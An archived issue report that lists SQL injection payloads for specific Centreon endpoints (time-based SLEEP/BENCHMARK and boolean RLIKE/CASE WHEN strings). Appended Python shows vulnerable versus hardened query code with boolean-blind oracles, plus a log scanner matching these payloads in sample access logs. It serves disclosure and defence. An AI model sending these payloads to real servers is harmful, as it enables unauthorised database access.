This repository has been archived by the owner on Dec 13, 2022. It is now read-only.
Author Name: Louis Ferret (Louis Ferret)
Original Redmine Issue: 6452, https://forge.centreon.com/issues/6452
Original Date: 2015-06-30

Here are some pages which allow SQL injections:

Method: POST
URL: /centreon/include/home/customView/action.php
Parameter: user_id[]
Payload: user_id[]=18 AND (SELECT * FROM (SELECT(SLEEP(5))) YGTW)
Comments:
Post authentication
AND/OR time-based blind SQL injection

Method: GET
URL: /centreon/include/monitoring/objectDetails/xml/hostSendCommand.php?cmd=host_passive_checks&host_id=&sid=[Number]&actiontype=0
Parameter: host_id
Payloads:
host_id=14 RLIKE (SELECT (CASE WHEN (6703=6703) THEN 14 ELSE 0x28 END))
host_id=14 AND (SELECT * FROM (SELECT (SLEEP(3))) ZaDF)
Comments:
Post authentication
Boolean-based blind SQL injection
AND/OR time-based blind SQL injection

Method: GET
URL: /centreon/include/monitoring/status/Hosts/xml/broker/hostXML.php?sid=[Number]&search=erer&num=0&limit=30&sort_type=host_name&order=ASC&p=20102&time=[Number]&criticality=0
Parameter: order
Payloads:
ASC, (SELECT * FROM (SELECT(SLEEP(20)))a)
-1629 OR 8329=BENCHMARK(3000000,MD5(0x584f4a6f))
Comments:

Method: GET
URL: /centreon/include/views/graphs/GetXmlTree.php?search_host=&search_service=&sid=[Number]&uid=[Number]&id=[ID]
Parameter: sid
Payload: '+(SELECT * FROM(SELECT(SLEEP(20)))a)+'
Comments:

Method: POST
URL: /centreon/main.php?p=3
Parameter: host
Payload: 14 AND (SELECT * FROM (SELECT (SLEEP(10)))a)--
Comments:

Note that I am copying this by hand so I may write a few typos from time to time.
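Added example, not part of the issue and not Centreon's code: the two query-construction patterns behind the host_id and order injections listed above, each next to a hardened form. SQLite stands in for MySQL, so the probes use a portable boolean condition in place of SLEEP()/RLIKE; the host table, its columns, the row values and the function names are all assumptions.

```python
import sqlite3

# Constructed stand-in for the host table the injected queries run against.
# Centreon's real schema is not on the page; these columns are assumptions.
SCHEMA = """
CREATE TABLE host (host_id INTEGER PRIMARY KEY, host_name TEXT, criticality INTEGER);
INSERT INTO host VALUES (14, 'srv-web-01', 1), (18, 'srv-db-01', 1), (20, 'srv-mail-01', 1);
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- host_id inside a WHERE clause (the hostSendCommand.php case) --------

def lookup_vulnerable(conn, host_id):
    """The request parameter is pasted into the SQL text, as in the report."""
    sql = "SELECT host_name FROM host WHERE host_id = " + host_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, host_id):
    """Hardened form: check the type, then bind the value as a parameter."""
    hid = int(host_id)  # "14 AND 1=1" raises ValueError before any SQL runs
    rows = conn.execute("SELECT host_name FROM host WHERE host_id = ?", (hid,))
    return [row[0] for row in rows]


def boolean_oracle(conn, condition):
    """Boolean-blind probe through host_id: a row comes back iff `condition` holds.
    The report's SLEEP()/RLIKE payloads use the same AND-tail; only the oracle
    (delay, error) differs, so a portable condition is substituted here."""
    return bool(lookup_vulnerable(conn, f"14 AND ({condition})"))


# --- sort_type / order inside ORDER BY (the hostXML.php case) -----------

ALLOWED_SORT = {"host_id", "host_name", "criticality"}
ALLOWED_ORDER = {"ASC", "DESC"}


def list_vulnerable(conn, sort_type, order):
    """Column name and direction concatenated into ORDER BY."""
    sql = f"SELECT host_name FROM host ORDER BY {sort_type} {order}"
    return [row[0] for row in conn.execute(sql)]


def list_safe(conn, sort_type, order):
    """Identifiers and ASC/DESC cannot be bound as parameters; allowlist them."""
    if sort_type not in ALLOWED_SORT or order.upper() not in ALLOWED_ORDER:
        raise ValueError("rejected sort parameters")
    sql = f"SELECT host_name FROM host ORDER BY {sort_type} {order.upper()}"
    return [row[0] for row in conn.execute(sql)]


def order_oracle(conn, condition):
    """The report's `ASC, (SELECT ...)` shape: an extra ORDER BY term. Every
    host here shares criticality=1, so the injected CASE decides the order and
    the first row name leaks whether `condition` holds (ascending host_id
    when true, descending when false)."""
    payload = f"ASC, (CASE WHEN ({condition}) THEN host_id ELSE -host_id END)"
    return list_vulnerable(conn, "criticality", payload)[0] == "srv-web-01"


def rejected(fn, *args):
    """True if the hardened function refuses the input with ValueError."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = open_db()
    probe = "(SELECT count(*) FROM host) > 2"
    print("WHERE oracle:", boolean_oracle(db, probe), boolean_oracle(db, "1=2"))
    print("ORDER BY oracle:", order_oracle(db, probe), order_oracle(db, "1=2"))
    print("bound lookup rejects payload:", rejected(lookup_safe, db, "14 AND 1=1"))
    print("allowlist rejects payload:", rejected(list_safe, db, "host_name", "ASC, (SELECT 1)"))
```

Binding fixes the host_id case. The order parameter sits in ORDER BY, where no driver accepts a placeholder for a column name or direction, so the only fix is an allowlist. The ORDER BY oracle also shows that the SLEEP() payload is not the only concern for that parameter: any injected expression there leaks one bit per request through result order, with no delay needed.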
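Added example for anyone hunting for these requests in web-server logs; it is not from the issue or from the Centreon project. The signatures are built from the payload shapes listed above and run over constructed access-log records modelled on the GET URLs in the report. The records are made up: addresses, sid, uid, id, time and response sizes are placeholders, not captured traffic.

```python
import re
from urllib.parse import unquote, unquote_plus

# Signatures derived from the payload shapes in the report: time-based
# (SLEEP, BENCHMARK), boolean-based (RLIKE, CASE WHEN) and inline subselects.
SIGNATURES = {
    "sleep": re.compile(r"\bSLEEP\s*\(", re.I),
    "benchmark": re.compile(r"\bBENCHMARK\s*\(", re.I),
    "rlike": re.compile(r"\bRLIKE\b", re.I),
    "case_when": re.compile(r"\bCASE\s+WHEN\b", re.I),
    "subselect": re.compile(r"\(\s*SELECT\b", re.I),
}

# Request line inside an Apache/nginx combined-format record.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(target, limit=3):
    """Undo URL encoding until the string stops changing, so a double-encoded
    payload is matched in the clear. The first pass treats '+' as a space
    (form encoding); later passes do not, so a decoded '+' survives."""
    decoded = unquote_plus(target)
    for _ in range(limit - 1):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return decoded


def inspect_line(line):
    """Return (method, path, [matched signature names]), or None if the line
    has no parsable request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = decode_fully(m.group("target"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(target)]
    return m.group("method"), target.split("?", 1)[0], hits


def scan(lines):
    """(line_number, method, path, hits) for every line with at least one hit."""
    found = []
    for number, line in enumerate(lines, 1):
        parsed = inspect_line(line)
        if parsed and parsed[2]:
            found.append((number, parsed[0], parsed[1], parsed[2]))
    return found


# Constructed sample records modelled on the GET URLs in the report. The
# addresses, sid, uid, id, time and sizes are placeholders, not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Jun/2015:10:15:02 +0200] "GET /centreon/include/monitoring/objectDetails/xml/hostSendCommand.php?cmd=host_passive_checks&host_id=14%20AND%20(SELECT%20*%20FROM%20(SELECT%20(SLEEP(3)))%20ZaDF)&sid=1234&actiontype=0 HTTP/1.1" 200 512',
    '10.0.0.5 - - [30/Jun/2015:10:15:09 +0200] "GET /centreon/include/monitoring/status/Hosts/xml/broker/hostXML.php?sid=1234&search=erer&num=0&limit=30&sort_type=host_name&order=-1629%20OR%208329%3DBENCHMARK(3000000%2CMD5(0x584f4a6f))&p=20102&time=1435653309&criticality=0 HTTP/1.1" 200 1024',
    '10.0.0.5 - - [30/Jun/2015:10:15:14 +0200] "GET /centreon/include/monitoring/objectDetails/xml/hostSendCommand.php?cmd=host_passive_checks&host_id=14%20RLIKE%20(SELECT%20(CASE%20WHEN%20(6703%3D6703)%20THEN%2014%20ELSE%200x28%20END))&sid=1234&actiontype=0 HTTP/1.1" 200 512',
    '10.0.0.5 - - [30/Jun/2015:10:15:20 +0200] "GET /centreon/include/views/graphs/GetXmlTree.php?search_host=&search_service=&sid=%2527%252B(SELECT%2520*%2520FROM(SELECT(SLEEP(20)))a)%252B%2527&uid=1&id=1 HTTP/1.1" 200 256',
    '10.0.0.7 - - [30/Jun/2015:10:16:01 +0200] "GET /centreon/include/monitoring/status/Hosts/xml/broker/hostXML.php?sid=5678&search=sleepy-host&num=0&limit=30&sort_type=host_name&order=ASC&p=20102&time=1435653361&criticality=0 HTTP/1.1" 200 2048',
    '10.0.0.5 - - [30/Jun/2015:10:16:30 +0200] "POST /centreon/include/home/customView/action.php HTTP/1.1" 200 128',
]


if __name__ == "__main__":
    for number, method, path, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {method} {path} -> {', '.join(hits)}")
```

The fourth record is the GetXmlTree.php sid payload sent double-encoded; it looks harmless until the second decode pass, which is why the loop runs until the string is stable. The POST endpoints in the report (action.php, main.php?p=3) carry the payload in the request body, which an access log does not record, so the last record produces no hit even if the body was malicious; for those you need a WAF, body logging at the reverse proxy, or Centreon's own application logs.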